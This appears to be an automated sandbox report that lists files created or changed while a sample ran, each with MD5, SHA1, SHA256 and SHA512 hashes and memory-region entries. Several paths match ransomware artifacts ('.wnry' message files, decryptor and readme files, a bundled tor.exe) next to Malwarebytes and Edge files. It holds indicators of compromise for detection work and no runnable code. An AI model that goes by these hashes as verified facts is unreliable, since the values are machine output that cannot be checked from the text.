SHA512 9947529cab455151fc1ce09828ebf195de922b41a303c12f33baf5670729b533cadb28f360301f2a0ad14f3c7315ba90955a0bdcb7828ec1920b349fada2f518

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 d9fd77e6b6d7870c70083e88f07c9c61
SHA1 11db2dfaec0f897d0e1d12a0871696f42a739a4a
SHA256 1bd87e406eae49bb104b58bd3c06888617ddad138ed3679909f7c76609c6d5d0
SHA512 43e5f3c4016fd7e5d515fc0fc0f6d82f6710d734885d76455475c952c05c7aaa117c6fa75ee5f08ce2cdaacc63332803f3582aa9d52ce7faaff66548a2187198

C:\ProgramData\Malwarebytes\MBAMService\config\ArwControllerConfig.json

MD5 19d419b81eaf346a4b8cb41d9bd14f65
SHA1 785501c090a4876c1cf8f347b3c3188c9e4c1ae8
SHA256 d42c3b7af67332bc93a1d2a449f470216d95007321b5a388a7c0c7b9d704f211
SHA512 7658d4c15fd5be73e1c3ce82a3111601bb0dc40ab36e5d3843b68cd88993d839c1038f7fd77c860afc059054ea692273f46443bc191563b641d1bc77417ce0a6

C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.cat

MD5 1cd8abdaea3bcd30214f01046ecd450d
SHA1 abc8fef03a274dcb9f15c17396e9f0af85a0b0fd
SHA256 cf981ad0b084c330fbfc00f9e559404c6731d407a9f004ce68b50ecd7abe7425
SHA512 a04f2beafbe2311a5eec84f8ecff16db1dda864d420643184b0164aca9958b679205c3ab23bb71095d710f45dc4c3c51ff8b267c36a1ffc768126b48556f5f86

C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json

MD5 10fc64d39cc15810c7fa636880b5d3a1
SHA1 a0f15ade77cb50dd5335355eed68cbbb492c4fe5
SHA256 1e84ec9e402a09d6adb55eb361b6244733eebf2996bd7bef3d517379e7d7bd91
SHA512 307210d2df4c13187460c7710cb4a1959eac1cac1db237646a6b031e522be73aac76e5658156c53a68b5ac97641dbd7dbddc051ee8064c235cc6f8fa9944697d

memory/1708-6451-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.tmf

MD5 68ecb046a9069c74f09ad967d69f599f
SHA1 6d58724c81e333a2b0f9b573e10fd677922ecb4f
SHA256 4d0aeeb79a3dc56eb947f78d83869822459fa335daad98fbe0cac6d2e52dc8d3
SHA512 86f1cd8172d600d34e8da12f3e367ca76a17995433f3a1b733213efffc7d73edc9277ea3c2eaf2f390d9d4cb933552216b5b206b1e4fadf2b64af4af250182e7

C:\ProgramData\Malwarebytes\MBAMService\ARW\mbarwind.arw

MD5 31f4ed6c2077a6712cfc2b27762b580b
SHA1 57c68266fc9b49c5d7dc62a15eb6636befcbc84b
SHA256 1ca6574269eb2e6daa059cec58c5e999fc6345bb8a93a7b3e22fefd34a7ea8b3
SHA512 13d9727a694c88fde149517beb4d16938f328486065b9d491151b06855312cd0b5deda67a2ee4ba85280d19d7d6b648bf0b6ffd3ed9cb346ba9ed0cfe9ceeed6

memory/1708-6613-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

C:\ProgramData\Malwarebytes\MBAMService\ARW\ARWFI.dat

MD5 917802c75d01c9f5a2236df21c7d6afa
SHA1 1abd2e7309824b3272ba3afb0b5004d247d0995a
SHA256 085e656a56bf088cb0eaf7e4c5c27123682e519daab1a3459b689460c4bbabe8
SHA512 fdc5bdac5de8f5af8d25c4d5638a8bdc66ce2023aa9531ca15f1eb33721e552b601758e5a375999f687878fdcd2863a74ac300ec399ff3f7d939d49858095096

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 ddbafc63cbacf898ae3d2474ad40a6b7
SHA1 ad95dfdeb6d1fb755a135f5b7e181eed0435874c
SHA256 2799b50df8d841e8e197fac1ac9b9cb321aff2fc0fe9d5dc839e81786b2adc96
SHA512 a341665f57fdebfae326b949fb722188d0a48409bb5a038fbcc94e66da735c7dc95ab9ee39dff10a5cfcca11d259e7f32613bc8c00818cc02eddf40d12f0460b

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 c08264f32dd3992a585bdf01e8c4237b
SHA1 3f3696b0ac6dc59331ff3512a441a5418f85ca31
SHA256 d8baa43b2e10057185e1efe514cc3bad8a787e304df32f16e629ad9611889920
SHA512 4dba224113cee3a36891cd48c99ac9bccac4cf9af9765dbb40a4bf285c086d452a36dfb33ab07268cccdd0bc8defc4118c46b571a3fb879bf68543cc6419a91c

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 810bf253336b4242f5f23e0e3a59ae99
SHA1 a644289e4b364ce549aead6a1ce456f34c85f010
SHA256 6cf86669238bdebdbd2565498b1600bc660c3753bd077593ace268dc1cecaf18
SHA512 6a617cca19c0908199ec27421312aea52b358545b4db3c2988dfd45aab1269db469c5e5887c9264c4c7f26aa4674c3c2ba0327af13748f17c56fd6539e208181

memory/1708-6773-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

memory/1708-6776-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 d9a7f09db91b75a811de1fdbd40b5a00
SHA1 d77247263e256270c3602348ccbcdfe03cb02e94
SHA256 b6e15f787fca8bd1310862fecdfb36eacdb6aba6b1987c6b3a5e2f5ea76b61d8
SHA512 f0ffe28a1b6837e0cd42ef587a450103544a5cd56019e124ae69107d6ba5536dcff73ea8f2949cd9edc342140a0f3d1b04d2494089e60736d5d2c6c1d9ded912

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 6b670d328f63b62f85eb9fdbd7373566
SHA1 a94acb37794b0ef260d101bccfc5aed4bdce3d52
SHA256 d8d05de9aae1d0591fd8b5e3eb0443f573fadcd6d9e488a5868822e8f0482e64
SHA512 a7f1591c6cd8e6efb6630eb01c5d26d0ede491d5d2dcf15bb4665016dd9a1495870135c71fbcce5e8bb0803723794b8a9864522df18413037c34babcd9cd2b07

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 31079b1feacb0e00d5069df0eeb4bf27
SHA1 4d9c26b26e4f897583fb838cab27e9a4dd91e451
SHA256 de6f48e4d9bd6b72bda5ce3b7a481a8a51cf82a0bd759825d038d6e469e6aab9
SHA512 6cb75d7e489f6e0b6b4dc6e53ad98b925dc1338bd16b9d57918f5777a48ac960870f8c32ce91c41dad2623a149409e25170e3d84fc5e3cf3274bea399c0ac00a

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 685845df19a7cad14901ec51ddeeedfd
SHA1 83b9c2051ede1c557a6aa1f1cc9f5b2d61380d36
SHA256 50f1c58c10cb86a74d7d58fa5871c7fb565db198355b969161ac144854327a42
SHA512 91df33d978063a5d97373506ba42f0e4bc0bb30c643d801fa04ab662b82a4e97a6e9aba9509834c38b0cc97af585df846ad67982593913dc3eeeaff02eb164e3

memory/1708-6800-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

C:\ProgramData\Malwarebytes\MBAMService\updatrpkg\SdkDbUpdatrV5.dll

MD5 8eabfa07079f51fd528b7510b9a97fdf
SHA1 9a2b1d3d7824df1bad648e3675b7fa945ca418d8
SHA256 c474f651aaf9142b8b73869c9e69b4834c97f497d071a34ea2b269cf1ea1fda7
SHA512 a4b459056c5cffdc93fc21c2c0ffeb905b9bb41a005bceea84b9d3d5c14f28bd6f8fbd5788d4cbc5a36a0e57308afcc753c5c86e2519e10b0b929eb0a859a435

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 4e04a31bc83882ab1d6b6a9c58d6533a
SHA1 1c3f287f6d42415d88f74cba803a2383c602012f
SHA256 bb325a01da6a1d2dd017511b274d20083307e20819bfdcec1aeb45ea9476e274
SHA512 ca83a51ab0300ee55eadb4101989482d25b97731e8c487124fa88aae1848d5227dcda413f3a1f06cdc28fa40cf755138271f2d41ff83f188df4bc26f6fff623c

C:\ProgramData\Malwarebytes\MBAMService\updatrpkg\mbupdatrV5.exe

MD5 6a5733cadc6e1abab98e575c5d8b6d03
SHA1 243fecb166b6047253a1c2316d6f353f0f294236
SHA256 efa7994aba4951da9b2274f88eba89f4ba07dffb3e40f79a1720d3166215ab98
SHA512 c473fa679c546293a4941d4e0a17699fe15d2cd6349d13846ee16427f34eac6ee647bd14eb442e9c5ffc8d471e9aa1977fb1d1ae64df0992b5786a65f3717eeb

C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json.bak

MD5 b6f58832f2569db11edd7fa6ba3d6430
SHA1 f1f3c960ff2b05871c1fa6c9f0c1e9f1b0392957
SHA256 43a40397c40c2982b0f7f84ff34f207f1f74aab35475fd5ae73cc2b990b9176c
SHA512 b54d058859c78fc6886e545054555ea233923f5e4f973f3e80893181e9ca4f0a6fa9dd0f2b39806f6e5d3641d4305f9c661ce7d9a24e882b4aab17e9e5ba45fc

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 3177cd1362a29be4775aa3be6a319144
SHA1 91ac98d46247f119cf7ac3e274d95f284dac14dd
SHA256 f0091b5e34013356807cb6ec9472a7fa5c5c6fec00dd9dc68c8d8a89ae966fde
SHA512 a9ebb7fa47594836205811fcad06d4c859a5d383157754b45e1cc34af6fba03a442b0305a7010b932105cf3c08c877e2cec9d62d616d7552eb28cdf16803c150

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 23e1cc1e0d8fea99e0ab2dd02f426ced
SHA1 9955b6fb5394a197adc0b80a8ebcd02d0cfb1bc8
SHA256 fcd1c65451e66df70bda7eb85eca1df1f0c01678fe91458aa37fcecf7a33ffca
SHA512 f4681016f658da451c0555a36f4f24b3f17512b075608d0d6090601e3a9b0ff95967a188d9baf4cf09834021fa1e9b2e592d0d40986b7ec607fb1be4a7691ad6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c8a192a51dec25085282fb16224951f3
SHA1 9aa6a9507c67138c7192e86c52140c6a53b9988c
SHA256 880cd4f33b6b76546ff758ed6993b532f35d43964bd8b38bb1dad3cabcae3081
SHA512 a924f2b3c7524751fbd259b14e0feaa723491bc6a0da3be8f7d950d4887ffd709cab4502897e81c408fa131220b8bd7c71b6bf1a5968642930c65923b8087d4d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\2f39b873-a817-4afc-8439-378bd32f3a24.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 862a4a8081f8289e776d5190e2d6d6f7
SHA1 2899329fa34f4191477a843379ebc4a39da05b27
SHA256 d1b492da0d5d9a493870f30d95f38aa302dabdaeed5370868dccf341a3ebda75
SHA512 336e6e559d7083d3629ca68742f5bc60aa1ab724f4232d4fb781e81bf90e2d3465f831569f153054d4581bbaa572b28870576134db16819c5b7143b4432fdc6e

memory/1708-6866-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\adc574ca-6c82-43a0-a802-13ec1c4fb420.tmp

MD5 343b1a5d98de92a52f834e0914f517fb
SHA1 ce87a7e4953243fce4a3b2fb53e93463daf301f1
SHA256 13152553064fc6058285a25e038a66b95ab27bae7d9257a6cd2a61fb30e3d606
SHA512 21043c47aaa9ecca900917fc73b8ad671248e1d214b94c91c34e07a0e20c8293759ca36ea4ca95cea6addf3b79a3ec1865e6227897bf7d460eec428d166770d5

memory/1708-6919-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

memory/1708-6923-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 37794e5cc0e797a20c3949be5a7d43b8
SHA1 6f08a8a1d7758d13ac5ce51e06701c4a271707e9
SHA256 c53897be82f68dee4148dea50d9033f4f34269a8379667916e5a6f62d01a9971
SHA512 d9d24bdf89a8c44a2fb8d1adc66a2be516442051ee693761959fdaac3fbde9a3410f2651ba54daf7053cd85367d0a4b1cd82ba949b5050f7a232aaefc4d78253

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b75ba0fe6b642475b9e47fb6c5be70a3
SHA1 2865fc8a37299ea19432b0781cd9fc46d4187d02
SHA256 d5791515332bc115e69de50b5e6ed035b05d7fb0be2f8261de2758d589415e14
SHA512 5b02c975764386269808f856301c9e07f20e2744e9a29892b256b1a4fa0320954ae7d88f9ec80199b9e2093ce8d355c4dbe18b06377fbe4aea4b4058560f79dc

C:\Users\Admin\Downloads\Unconfirmed 757333.crdownload

MD5 84c82835a5d21bbcf75a61706d8ab549
SHA1 5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512 90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

C:\Users\Admin\Downloads\Unconfirmed 939845.crdownload:SmartScreen

MD5 4047530ecbc0170039e76fe1657bdb01
SHA1 32db7d5e662ebccdd1d71de285f907e3a1c68ac5
SHA256 82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750
SHA512 8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9b67495338496753c86ae4d29e52ace6
SHA1 476dc69fb0d592a5455337d60bb64705e97a7769
SHA256 9d8e8eccd1b6e3380abf66ae0e705dfcbc602a3d2c5c1d798776be11322f7f31
SHA512 fc8c77f6507430a46e8e9392521e9257cc5c15a03c0f25dcd74592ea459809d4e8b89b011620ae3a3996c6e86dd2038ea48eaa9193712d42d5cec682901e0058

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a6492782d3a44271c4cdb5b303ea092e
SHA1 fd92fc8d9df7ae746930f73269c98ab109e9c7c2
SHA256 d1dbcedb5537a1c2701c26a430b2f720d17d5e63333140520428c73ab82c933f
SHA512 d6edbf269de8cc6f38768c860b088e9e7ab3ff5d923773306b768e32eb01ad94b2a2aaa241fa18298f10ba8ce456322954fd28d8a0194816be7cb385f7fd1116

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8887459fb234fd49c65af85b18cb673a
SHA1 298888ad6a8a6f7abff842a1056c880ca85be5d3
SHA256 e286daf0061636b83dcfdbfb9200df8edf018929b8670cb02b5d3b5d75ac566e
SHA512 9292304ad0d123f927277d158e52027c0fe3dfca339d7cd3135fcddb9e33559b6c393bea96b38a90f6046252b73c5a13ea62fefd9cbe1768336ed942ef61d191

C:\Users\Admin\Downloads\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

memory/4820-7127-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\Downloads\@[email protected]

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\Users\Admin\Downloads\@[email protected]

MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

C:\Users\Admin\AppData\Roaming\@[email protected]

MD5 07b09ef1ba5d0466ea7ec17fe1e110e3
SHA1 4deac1f00a9157acc2988b20ae93ec8843d73d3e
SHA256 b1dc752cb76d319e622195589578fb4f729581253c36e857658a3a6c7f1eaf0d
SHA512 c513ebb052639226ab89eda39a3f9de3e5033b567827bdfb3f883f017e8a0978119c486d7177f99d38f1d897f8ef115f5f37a1c60ec28a34188cd9c70d59293e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ef0dda8ee51afadc25c196467348beed
SHA1 86f4a3972229c49bd412eb10642a3cf34f08e9c6
SHA256 95877d0d477fa633983f8fcc052207d401a8f293f1454e749513a7b35bbca2ec
SHA512 067fe362f7c78317617993e316f0b759e852b42b2892c8abdd646b0e5b5bb3e4de3b2b66e6f69e51ed925f163f83d4840a2dca6a49c7d6ce80a6e4f9d755d610

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b4d4cac588e94f3c8b9cbdbb1aa485f8
SHA1 cfad19b119f87bb47e05e9b3968da30c340fa9a1
SHA256 a262ee3b18ecb9991b6a5aee7879e6a1091d31b8c62563dcfcc5d3bb457c9067
SHA512 213dc0fe2e30743c9944f5e2102cdddadcb64b6606f14f0c2e6ac9504d91d04f17bf5e81d644ded44633a5c935809e429426e0bbd4a778a389ce356192d6375f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 f9e2158d5d2075549f49081c6ed5c9b9
SHA1 22dcce58d3d8c5692430b79ccb43607655423d88
SHA256 d679895bddd11dfb5e00a5ffd4683026375a47e0bceaa4e79f93c25e405720e4
SHA512 d96fa8d239e60fa1c2b5383374330c1c2fb247059d21227940f9d9b8a6ecc9fe92f964c1d6a0743ad8b98d64812def596fbd327a7df03a54f7029d867bd68356

C:\Users\Default\Desktop\@[email protected]

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

memory/5272-8692-0x00000000738D0000-0x0000000073952000-memory.dmp

memory/5272-8693-0x0000000073690000-0x00000000738AC000-memory.dmp

memory/5272-8695-0x0000000073550000-0x00000000735D2000-memory.dmp

memory/5272-8697-0x00000000738D0000-0x0000000073952000-memory.dmp

memory/5272-8698-0x0000000000730000-0x0000000000A2E000-memory.dmp

memory/5272-8699-0x0000000073690000-0x00000000738AC000-memory.dmp

memory/5272-8701-0x00000000735E0000-0x0000000073602000-memory.dmp

memory/5272-8700-0x0000000073550000-0x00000000735D2000-memory.dmp

memory/5272-8696-0x00000000735E0000-0x0000000073602000-memory.dmp

memory/5272-8702-0x0000000000730000-0x0000000000A2E000-memory.dmp

memory/5272-8719-0x0000000000730000-0x0000000000A2E000-memory.dmp

memory/5272-8723-0x0000000073690000-0x00000000738AC000-memory.dmp

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 62aed9568d85bea2de2be336d6e3d4e9
SHA1 c6ba6810e7d79b935736e690def081c09cf6f9c2
SHA256 66c66e7f8d294fc080c607655265245a966b222958737c339d2433274d72416c
SHA512 409a93a93d38c6282386e5e1f05e870c6e672637889d31cea8670719ed756e62ba44b734f0efe58e89d6119ccc804e56340253a52007eb1c0dbbbca246bb89db

memory/5272-8721-0x00000000738B0000-0x00000000738CC000-memory.dmp

memory/5272-8720-0x00000000738D0000-0x0000000073952000-memory.dmp

memory/5272-8726-0x0000000073550000-0x00000000735D2000-memory.dmp

memory/5272-8725-0x0000000073610000-0x0000000073687000-memory.dmp

memory/5272-8740-0x0000000000730000-0x0000000000A2E000-memory.dmp

memory/5272-8743-0x0000000073690000-0x00000000738AC000-memory.dmp

memory/5272-8749-0x0000000000730000-0x0000000000A2E000-memory.dmp

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 68ac2fff01f67910bb61109917c46658
SHA1 cc93e8ac029f870a9300c74c5f41d9ae7184ab91
SHA256 64cc50409355cda2e92607589b9dc2f3fef60dc7f8e14734bbab4129265eca9e
SHA512 f6fbb154435ca303b8fb3e58ca3dd6c9febc516df895142e515000c2305b77df2628192091a193ba79748cfd58e9ae2b49153ec7887505a0c17f965543a46db3

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 3e8dc3c1655ffd9d4753b6d51c431ca7
SHA1 a1a2776dcc66e78ec334375e1cb726594baf8517
SHA256 1be8f96c6f05f40bbf4ecdba2a7e886b4089df90e021cb18a0692389d1ad6c72
SHA512 c2370b6dcea0ca6b0f104a1fe9a0a8185df8baf6d56c997ce13f981d2ed5333c8ad785f7f4c77a885c6123cecc21bf411065eeda10d710550ae733ab2c6c215a

memory/1708-8769-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

memory/5272-8770-0x0000000000730000-0x0000000000A2E000-memory.dmp

C:\Windows\System32\drivers\mbam.sys

MD5 d35c2215a804bc236db0589596916dd2
SHA1 bd362b3795d77b81e9f03283e7cddc9c15ebb0aa
SHA256 db1e73c3820c198cc181e666e2b201bee0319d6c98263e7d2655942def0a9617
SHA512 18439ccccce3ad1214084fb584c6959db31e589b3ca5b2fac0a7dad7bcfcfb6affc2343878931b4dc30dcbf4ce8721730e31535e759e9953af531566b3373436

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 5f943bd715dfb72513d8d94e87c7ae3c
SHA1 9faee9d2014025e1e617c1ddf19202a6cd584c18
SHA256 7a0a3a7939e8f128aab8c54c561290272978a9e09cbdcb84364bcb7ff68efdc0
SHA512 ef5498a27eaf8cd274d09a760917420296a8de6b02a6b57ae72287f6470158e35c3e279838c5d5dba440fdbfd11b0869a8c58456157a0f717e37f8b2ab206319

C:\ProgramData\Malwarebytes\MBAMService\version.dat

MD5 500295cb5ba4d85a0617bc1465a39e26
SHA1 5efafce74c065446d0dbafd581fa017223278b3d
SHA256 c9d2e4617b300d386e0d12573dac6bdf192588b096adfc77db0571c72549d327
SHA512 2b3e6111edb97432dba728b44722d7775f3027704a97ca844947c4d735099b998e714a6141d1c30d48f419c9da6863448d602ed61f31c5c08a3286c8a38734be

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D1B.tmp

MD5 804b9539f7be4ece92993dc95c8486f5
SHA1 ec3ca8f8d3cd2f68f676ad831f3f736d9c64895c
SHA256 76d0da51c2ed6ce4de34f0f703af564cbefd54766572a36b5a45494a88479e0b
SHA512 146c3b2a0416ac19b29a281e3fc3a9c4c5d6bdfc45444c2619f8f91beb0bdd615b26d5bd73f0537a4158f81b5eb3b9b4605b3e2000425f38eeeb94aa8b1a49f2

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 5e17b5df341faab1e8a8dfe20d945e6c
SHA1 0818e981e3825aebeedd2dad9c8acf3a568208e3
SHA256 799948d9748a6f4ffe9106510374716e2ad669c29ed40e9b68a38a0e447936fb
SHA512 1ff9ea0f113676f197b862b2752147828f3cfb954da829be70331f19447c8a97c83963744e129f71c96eeec60646c9ac4571f9fadbdc92bc4300cc2f9619f055

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\21EA03E12A6F9D076B6BC3318EA9363E_6EF0095DA824AE045AE9FC5B645DF095

MD5 5bfa51f3a417b98e7443eca90fc94703
SHA1 8c015d80b8a23f780bdd215dc842b0f5551f63bd
SHA256 bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128
SHA512 4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D31.tmp

MD5 2f0c9aecc1462093b28cfb654b777e42
SHA1 159c85f81fd530b65f127700a1c0673912ad753b
SHA256 2dff0b0a89752a6345f56f40434af422f29fd6b7679b129ed9b8ef871b459236
SHA512 f4341ee339352aae2a68e4f0f06f259805a48f28898ad914bf3f97d8e304d6c27bbb9dc9a1f8c35642e70b3355f5f4627a7ae6712d809031765a647925c8ed85

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D32.tmp

MD5 19167bb1ae169e319e62aa8a11bf2122
SHA1 4b7942151c595ffa3b23a2a954fe89823e34c8a7
SHA256 b6fd2e79738e993263efb4553ed9a94b98300c543f7c0d38a0bc7bceae9fc2ea
SHA512 599e1c792490b0e9a95be06224486c0c694bd2a6d5970459875c802a7143ebdd727f1f7f316282afd64934d5d6932b91fe22a518000f0ef930140a0e7aecfb2c

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D33.tmp

MD5 b7d2b8d14e781fc907bc05da237298e8
SHA1 ef9deea8c105ce65839fff82e6f46e1856f2faf2
SHA256 ca940acd0286d4405c7bf8452acdb813df5bdbe397b8e9c222e86e812e4e7865
SHA512 b24944d0e122976812f6cf3dd04d9066778ce295e39957c1cac6cc29a67b97767af6d7a6bfb3ed403d0e3d432f8a9fff459e85528a4dcf2405fa7bba311ef8fd

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D34.tmp

MD5 502ad9edec43e186939b4aa4f8c3248f
SHA1 4a5b771046a7449acc184a0ff4965d9edbd296c2
SHA256 946f402b3d7057f31fbb2fa8513bcc6eb3c64efb0503a4c5c9632b9813b4260d
SHA512 7f7bab17820ad7c1900a25b62011bae7d808d5a75de4dd014b5ac23d9033983380952eeb1bf0eb5a0435988d9231d875daea5443bafd698364378f943117b01d

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D35.tmp

MD5 5327fbf6f3ce7dc1abb2709d177f436e
SHA1 f2618215606259a664024b170025aae65c3a27d7
SHA256 07adbdb09f360ed068d2d3f96083faf036988d2cf57ff3f20e2abe3bbb26e336
SHA512 e6d869c848fcf833d021c9849da6035b37fec1206f15bd1bb5c2b436185ab99807308d84bb9eed30f258884b26b0cd496a60eb84821bc1c689b2d462f07de263

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D36.tmp

MD5 5b1802fd3bf10043529b7c674e2a1c9b
SHA1 e98281e099463034db606a062994adddf814f463
SHA256 2da0385efd9709f95059bdfbbfcf746d502d820fcff165f01dee4b3a77cbfcd2
SHA512 1bda98cdbe102596517f72d198d3ac3539a30b675c1379774afbf83b63ac81c641552036e2d95ffbc6fc4a41a39b9be62cdc014b9ecbf9e448a370354decdff0

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D37.tmp

MD5 b5d0f85e7c820db76ef2f4535552f03c
SHA1 91eff42f542175a41549bc966e9b249b65743951
SHA256 3d6d6e7a6f4729a7a416165beabda8a281afff082ebb538df29e8f03e1a4741c
SHA512 5246ebeaf84a0486ff5adb2083f60465fc68393d50af05d17f704d08229ce948860018cbe880c40d5700154c3e61fc735c451044f85e03d78568d60de80752f7

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D38.tmp

MD5 3b337c2d41069b0a1e43e30f891c3813
SHA1 ebee2827b5cb153cbbb51c9718da1549fa80fc5c
SHA256 c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7
SHA512 fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D39.tmp

MD5 aeffae9ee6610a1b941cae781422a177
SHA1 23767efd808cf1b0a19d8a4fe19998c74ad1e4b3
SHA256 2cdab1fc17ce70595586ab91b87c1c4b2dee7b2b462f180f22f4682fa4ddf4bb
